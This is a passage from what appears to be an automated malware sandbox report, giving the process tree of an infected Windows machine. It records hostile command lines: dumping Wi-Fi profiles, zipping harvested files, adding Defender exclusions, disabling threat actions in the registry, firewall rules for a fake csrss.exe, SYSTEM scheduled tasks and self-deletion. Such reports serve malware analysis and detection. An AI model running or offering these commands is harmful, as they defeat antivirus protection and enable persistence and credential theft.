        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=1932,i,12620889348285390567,13668104333615885459,131072 /prefetch:2
        5⤵
        
        PID:5852
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1932,i,12620889348285390567,13668104333615885459,131072 /prefetch:8
        5⤵
        
        PID:5876
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 --field-trial-handle=1932,i,12620889348285390567,13668104333615885459,131072 /prefetch:8
        5⤵
        
        PID:5884
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3024 --field-trial-handle=1932,i,12620889348285390567,13668104333615885459,131072 /prefetch:1
        5⤵
        
        PID:5976
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3032 --field-trial-handle=1932,i,12620889348285390567,13668104333615885459,131072 /prefetch:1
        5⤵
        
        PID:6040
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4524 --field-trial-handle=1932,i,12620889348285390567,13668104333615885459,131072 /prefetch:1
        5⤵
        
        PID:3088
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5160 --field-trial-handle=1932,i,12620889348285390567,13668104333615885459,131072 /prefetch:8
        5⤵
        
        PID:4900
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 --field-trial-handle=1932,i,12620889348285390567,13668104333615885459,131072 /prefetch:8
        5⤵
        
        PID:4324
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4768 --field-trial-handle=1932,i,12620889348285390567,13668104333615885459,131072 /prefetch:8
        5⤵
        
        PID:5580
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 --field-trial-handle=1932,i,12620889348285390567,13668104333615885459,131072 /prefetch:8
        5⤵
        
        PID:1264
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5160 --field-trial-handle=1932,i,12620889348285390567,13668104333615885459,131072 /prefetch:8
        5⤵
        
        PID:5156
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    PID:5384

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:6136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4456 --field-trial-handle=2244,i,861925222566734100,5228329984880658054,262144 --variations-seed-version /prefetch:8
1⤵
PID:5804

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4776

C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5180
- C:\Users\Admin\AppData\Local\Temp\1000985001\alexxxxxxxx.exe
  "C:\Users\Admin\AppData\Local\Temp\1000985001\alexxxxxxxx.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:6040
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2996
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Checks computer location settings
    PID:4364
  - - C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe"
      4⤵
      Executes dropped EXE
      PID:5064
  - - C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe
      "C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe"
      4⤵
      Executes dropped EXE
      PID:5220
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
      4⤵
      PID:4560
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        5⤵
        
        PID:1020
- C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe
  "C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  PID:2800
- C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe
  "C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5812
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2516
- C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
  "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3588
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:3232
- C:\Users\Admin\AppData\Local\Temp\1001073001\swiiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\1001073001\swiiiii.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2156
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6448
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2156 -s 872
    3⤵
    - Program crash
    PID:6540
- C:\Users\Admin\AppData\Local\Temp\1001078001\koooooo.exe
  "C:\Users\Admin\AppData\Local\Temp\1001078001\koooooo.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:6436
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6712
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:6732
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6436 -s 864
    3⤵
    - Program crash
    PID:6788
- C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
  "C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe"
  2⤵
  PID:6760
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
  2⤵
  - Loads dropped DLL
  PID:6884
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
    3⤵
    - Loads dropped DLL
    PID:6920
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:6960
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\172592802658_Desktop.zip' -CompressionLevel Optimal
      4⤵
      PID:6576
- C:\Users\Admin\AppData\Local\Temp\1001084001\random.exe
  "C:\Users\Admin\AppData\Local\Temp\1001084001\random.exe"
  2⤵
  PID:7088
- C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe
  "C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe"
  2⤵
  PID:6472
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
    3⤵
    PID:2880
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
    3⤵
    PID:6772
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
    3⤵
    PID:7004
  - - C:\Users\Admin\Pictures\b1xhQje6StVFbFNyt17A7HKf.exe
      "C:\Users\Admin\Pictures\b1xhQje6StVFbFNyt17A7HKf.exe"
      4⤵
      PID:4464
    - - C:\Users\Admin\AppData\Local\Temp\u3g0.0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u3g0.0.exe"
        5⤵
        
        PID:6604
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\FBFIJJEBKE.exe"
        6⤵
        
        PID:3652
        
        C:\Users\Admin\AppData\Local\Temp\FBFIJJEBKE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FBFIJJEBKE.exe"
        7⤵
        
        PID:5592
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\FBFIJJEBKE.exe
        8⤵
        
        PID:2236
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        9⤵
        Runs ping.exe
        
        PID:2640
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6604 -s 3320
        6⤵
        Program crash
        
        PID:6324
    - - C:\Users\Admin\AppData\Local\Temp\u3g0.1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\u3g0.1.exe"
        5⤵
        
        PID:5452
      - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        6⤵
        
        PID:1280
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1168
        5⤵
        Program crash
        
        PID:6620
  - - C:\Users\Admin\Pictures\eCYJ0s1deRj17KV7GdPcQmpF.exe
      "C:\Users\Admin\Pictures\eCYJ0s1deRj17KV7GdPcQmpF.exe"
      4⤵
      PID:1612
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5128
    - - C:\Users\Admin\Pictures\eCYJ0s1deRj17KV7GdPcQmpF.exe
        
        "C:\Users\Admin\Pictures\eCYJ0s1deRj17KV7GdPcQmpF.exe"
        5⤵
        
        PID:6984
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:6664
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:2452
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3096
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4872
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:3652
  - - C:\Users\Admin\Pictures\ARBYWqKn6Hd0z6F1N8zfptbc.exe
      "C:\Users\Admin\Pictures\ARBYWqKn6Hd0z6F1N8zfptbc.exe"
      4⤵
      PID:2820
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:6616
    - - C:\Users\Admin\Pictures\ARBYWqKn6Hd0z6F1N8zfptbc.exe
        
        "C:\Users\Admin\Pictures\ARBYWqKn6Hd0z6F1N8zfptbc.exe"
        5⤵
        
        PID:4924
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:1428
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:3808
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:1300
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:6452
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:2364
  - - C:\Users\Admin\Pictures\dJWa7D6W31HsmX5KFg5CQSbc.exe
      "C:\Users\Admin\Pictures\dJWa7D6W31HsmX5KFg5CQSbc.exe"
      4⤵
      PID:6812
    - - C:\Users\Admin\AppData\Local\Temp\7zSF26A.tmp\Install.exe
        
        .\Install.exe /knqdidBjund "385118" /S
        5⤵
        
        PID:4028
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        
        PID:2528
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:6140
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:3940
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        
        PID:6868
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 01:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\GzsMarl.exe\" my /XYsite_idsYH 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:1756
  - - C:\Users\Admin\Pictures\MJaa9E3NHAA3qynEctdW5ft7.exe
      "C:\Users\Admin\Pictures\MJaa9E3NHAA3qynEctdW5ft7.exe"
      4⤵
      PID:6972
  - - C:\Users\Admin\Pictures\izWkxqTjFUE1IvRdbs0U1Cfm.exe
      "C:\Users\Admin\Pictures\izWkxqTjFUE1IvRdbs0U1Cfm.exe"
      4⤵
      PID:7136
    - - C:\Users\Admin\AppData\Local\Temp\7zS43C.tmp\Install.exe
        
        .\Install.exe /knqdidBjund "385118" /S
        5⤵
        
        PID:5596
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        6⤵
        
        PID:5368
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        
        PID:244
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:3348
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        
        PID:6932
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bvsYAGfGVfhExjZmnp" /SC once /ST 01:53:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\PWCBPef.exe\" my /Xjsite_idNwo 385118 /S" /V1 /F
        6⤵
        Creates scheduled task(s)
        
        PID:6596
  - - C:\Users\Admin\Pictures\yHLQ9sSMS1CVHheHPqGa0ClB.exe
      "C:\Users\Admin\Pictures\yHLQ9sSMS1CVHheHPqGa0ClB.exe" --silent --allusers=0
      4⤵
      PID:220
    - - C:\Users\Admin\Pictures\yHLQ9sSMS1CVHheHPqGa0ClB.exe
        
        C:\Users\Admin\Pictures\yHLQ9sSMS1CVHheHPqGa0ClB.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6c1be1d0,0x6c1be1dc,0x6c1be1e8
        5⤵
        
        PID:2216
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\yHLQ9sSMS1CVHheHPqGa0ClB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\yHLQ9sSMS1CVHheHPqGa0ClB.exe" --version
        5⤵
        
        PID:2140
    - - C:\Users\Admin\Pictures\yHLQ9sSMS1CVHheHPqGa0ClB.exe
        
        "C:\Users\Admin\Pictures\yHLQ9sSMS1CVHheHPqGa0ClB.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=220 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240410015140" --session-guid=c99928e4-520d-4034-9be5-62701d35c9fd --server-tracking-blob="NWVkOGE2MGI4Y2EyYjFmNDQzNjMzNDlkMDc5ODBhZjU0NWU4ZTIxMDZiYzdkZjBlYTFmOGE5ZjkyZmNkM2YwYjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEyNzEzODg1LjQxMzYiLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiZmY2MTI3N2YtMDRjZS00OWUxLWE4YmEtZDc5MzlkOTQwYzc4In0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=C005000000000000
        5⤵
        
        PID:7056
      - C:\Users\Admin\Pictures\yHLQ9sSMS1CVHheHPqGa0ClB.exe
        
        C:\Users\Admin\Pictures\yHLQ9sSMS1CVHheHPqGa0ClB.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6b1ae1d0,0x6b1ae1dc,0x6b1ae1e8
        6⤵
        
        PID:4272
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404100151401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404100151401\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
        5⤵
        
        PID:4768
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404100151401\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404100151401\assistant\assistant_installer.exe" --version
        5⤵
        
        PID:1592
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404100151401\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404100151401\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x270,0x274,0x278,0x24c,0x27c,0x1150040,0x115004c,0x1150058
        6⤵
        
        PID:2468
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
    3⤵
    PID:6892
- C:\Users\Admin\AppData\Local\Temp\1001107001\jok.exe
  "C:\Users\Admin\AppData\Local\Temp\1001107001\jok.exe"
  2⤵
  PID:7120
- C:\Users\Admin\AppData\Local\Temp\1001108001\swiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\1001108001\swiiii.exe"
  2⤵
  PID:6724
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:7080
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
  2⤵
  PID:6968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2156 -ip 2156
1⤵
PID:6476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6436 -ip 6436
1⤵
PID:6720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4464 -ip 4464
1⤵
PID:6140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3168

C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
1⤵
PID:6588

C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\GzsMarl.exe
C:\Users\Admin\AppData\Local\Temp\PSDKJfZwxqLwdSgcp\oiJJZDuRYdKofkI\GzsMarl.exe my /XYsite_idsYH 385118 /S
1⤵
PID:1264
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows 